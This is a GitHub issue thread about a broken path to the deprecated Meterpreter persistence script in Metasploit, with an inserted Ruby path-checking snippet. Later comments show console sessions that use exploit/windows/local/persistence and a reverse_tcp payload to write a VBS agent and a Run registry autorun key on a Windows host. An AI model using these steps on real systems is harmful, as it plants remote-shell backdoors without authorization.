rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

incorrect path to persistence.rb #7875

Closed mark-r-stevens closed 7 years ago

mark-r-stevens commented 7 years ago

Steps to reproduce

How'd you do it?

  1. run persistence -h

line 82 in: lib/msf/base/sessions/scriptable.rb refers to incorrect script.

79 'metsvc' => 'post/windows/manage/persistence_exe',
80 'migrate' => 'post/windows/manage/migrate', …
81 'packetrecorder' => 'post/windows/manage/rpcapd_start',
82 'persistence' => 'post/window/manager/persistence_exe',

I installed Metasploit with:
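
A consistency check that would catch the mistyped mapping target reported above, added here as an illustration and not taken from the thread or from Metasploit's own code. The `LEGACY_SCRIPT_MAP` constant, the function names and the temporary module tree are constructed for the example; only the four mapping entries come from the issue.

```ruby
require 'tmpdir'
require 'fileutils'

# Constructed copy of the four mapping entries quoted in the issue, including
# the misspelled target reported on line 82. The constant name is hypothetical.
LEGACY_SCRIPT_MAP = {
  'metsvc'         => 'post/windows/manage/persistence_exe',
  'migrate'        => 'post/windows/manage/migrate',
  'packetrecorder' => 'post/windows/manage/rpcapd_start',
  'persistence'    => 'post/window/manager/persistence_exe'
}.freeze

# Levenshtein distance, used only to suggest the nearest existing module path.
def edit_distance(a, b)
  prev = (0..b.length).to_a
  a.each_char.with_index(1) do |ca, i|
    cur = [i]
    b.each_char.with_index(1) do |cb, j|
      cur << [prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca == cb ? 0 : 1)].min
    end
    prev = cur
  end
  prev.last
end

# Return { script => { target:, suggestion: } } for every mapping whose
# target has no matching <modules_root>/<target>.rb file on disk.
def broken_mappings(map, modules_root)
  known = Dir.glob(File.join(modules_root, '**', '*.rb')).map do |f|
    f.delete_prefix(modules_root + File::SEPARATOR).delete_suffix('.rb')
  end
  map.each_with_object({}) do |(script, target), bad|
    next if known.include?(target)
    nearest = known.min_by { |k| edit_distance(k, target) }
    bad[script] = { target: target, suggestion: nearest }
  end
end

# Build a throwaway module tree (constructed sample, not the real repository).
def demo
  Dir.mktmpdir do |root|
    dir = File.join(root, 'post', 'windows', 'manage')
    FileUtils.mkdir_p(dir)
    %w[persistence_exe migrate rpcapd_start].each { |n| FileUtils.touch(File.join(dir, "#{n}.rb")) }
    broken_mappings(LEGACY_SCRIPT_MAP, root)
  end
end
p demo if $PROGRAM_NAME == __FILE__
```

Run against a real checkout by passing its modules directory as `modules_root`; a non-empty result means a mapping points at a module file that does not exist.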

bwatters-r7 commented 7 years ago

Well, that is a bug, but I think there might be more. When I correct that character, I get:

meterpreter > run persistence -h
[-] Error in script: ArgumentError wrong number of arguments (given 2, expected 0..1)
meterpreter > run persistence
[-] Error in script: ArgumentError wrong number of arguments (given 2, expected 0..1)
meterpreter > run killav -h
[-] Error in script: ArgumentError wrong number of arguments (given 2, expected 0..1)

I may be testing it incorrectly, though. Certainly, at the very least, we need to lose that 'r', though. Calling @wvu and @bcook-r7 for some clarification of behavior.

wvu commented 7 years ago

Hi.

mark-r-stevens commented 7 years ago

I also get the wrong number of arguments when I make the change.

On Jan 26, 2017, at 3:51 PM, wvu-r7 notifications@github.com wrote:

Hi.

wvu commented 7 years ago

Is there a reason you're using the Meterpreter script instead of a post module or local exploit?

mark-r-stevens commented 7 years ago

Probably user error.

  1. Using version 4.13.14-dev on Kali 2. typed following commands and worked:

msf> session -i 2
msf> run persistence -h

get back help.

  2. run msfupdate to latest version

msf> session -i 2
msf> run persistence -h

get error on path to script not found. change path error, get error on number of arguments.

Perhaps I was using persistence wrong all along?

On Jan 26, 2017, at 5:24 PM, wvu-r7 notifications@github.com wrote:

Is there a reason you're using the Meterpreter script instead of a post module or local exploit?

wvu commented 7 years ago

No, I mean a module like exploit/windows/local/persistence. When you do run persistence, you're running the script. Scripts have been deprecated for literally years. :)

mark-r-stevens commented 7 years ago

I will give that a try. The internet is out of date :)

On Jan 27, 2017, at 10:35 AM, wvu-r7 notifications@github.com wrote:

No, I mean a module like exploit/windows/local/persistence. When you do run persistence, you're running the script. Scripts have been deprecated for literally years. :)

wvu commented 7 years ago

It sure is! Take a look at #7823 if you will. I'm fixing this as we speak.

busterb commented 7 years ago

Where on the internet did you get the advice? I think we should probably throw a big fat message up when someone uses meterpreter script these days, and try to get ancient blogs and training updated to the new method.

mark-r-stevens commented 7 years ago

Googled metasploit persistence. This was the first page that came up:

https://www.offensive-security.com/metasploit-unleashed/meterpreter-service/

On Jan 27, 2017, at 12:21 PM, Brent Cook notifications@github.com wrote:

Where on the internet did you get the advice? I think we should probably throw a big fat message up when someone uses meterpreter script these days, and try to get ancient blogs and training updated to the new method.

busterb commented 7 years ago

this should be fine now

locoalien commented 7 years ago

Hello

Look at the following example in which "run persistence" can be used correctly. With the new update of the Metasploit Framework, the way to execute the command correctly is to keep the session in the background while executing the exploit "/exploit/windows/local/persistence".

The following example shows clearly how to use it:

meterpreter > sessions 1 //Session in Background
[*] Backgrounding session 5...
[-] Invalid session identifier: 1
msf exploit(handler) > sessions

Active sessions

Id  Type                     Information                Connection
5   meterpreter x86/windows  NAME_PC @ SOFT-5493BEF518  IP:80 -> IP_VICTIMA:56616 (10.0.2.15)

msf exploit(handler) > use exploit/windows/local/persistence
msf exploit(persistence) > set SESSION 5
SESSION => 5
msf exploit(persistence) > set LHOST IP_LOCAL
LHOST => IP_LOCAL
msf exploit(persistence) > set LPORT 80
LPORT => 80
msf exploit(persistence) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(persistence) > run

[*] Running persistent module against NAME_PC via session ID: 5
[+] Persistent VBS script written on SOFT-5493BEF518 to C:\DOCUME~1\LOCOAL~1\CONFIG~1\Temp\HZgSBAKZlmgwW.vbs
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\hBHDMxJ
[+] Installed autorun on SOFT-5493BEF518 as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\hBHDMxJ
[*] Clean up Meterpreter RC file: /root/.msf4/logs/persistence/SOFT-5493BEF518_20170131.4255/SOFT-5493BEF518_20170131.4255.rc
msf exploit(persistence) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > ls
Listing: C:\Documents and Settings\RUTE

OJ commented 7 years ago

Let me guess, you're running Kali?

locoalien commented 7 years ago

Yes sr

OJ commented 7 years ago

You'll have to wait until Kali gets updated.

wvu commented 7 years ago

@locoalien: You're using the wrong run command if you want to do it within Meterpreter.

msf > run persistence -U -i 5 -p 80 -r IP_LOCAL
[-] Unknown command: run.

This is the console prompt. Interact with the session first.

locoalien commented 7 years ago

Hello @wvu-r7 As I have done it works correctly. For the latest version of Metasploit you have a problem entering the command run persistence -U -i 5 -p 80 -r IP_LOCAL. Then opt for the alternative posed in the previous post for people who present the problem by entering the command you mention.

wvu commented 7 years ago

You're on Kali. It's not the latest version until the next update ships.

meterpreter > run persistence -U -i 5 -p 80 -r [redacted]

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /Users/wvu/.msf4/logs/persistence/[redacted]_20170201.2430/[redacted]_20170201.2430.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=[redacted] LPORT=80
[*] Persistent agent script is 99589 bytes long
[+] Persistent Script written to C:\Windows\TEMP\iVTecA.vbs
[*] Executing script C:\Windows\TEMP\iVTecA.vbs
[+] Agent executed with PID 7236
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XFdjPLMihMasat
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XFdjPLMihMasat
meterpreter > 

This is what you should see if you're on master.

wvu commented 7 years ago

@locoalien: Wait, are you providing advice or seeking it? It sounds like you're providing advice. If that's the case, your followup suggestion is correct. You can safely disregard what I'm saying. Thanks!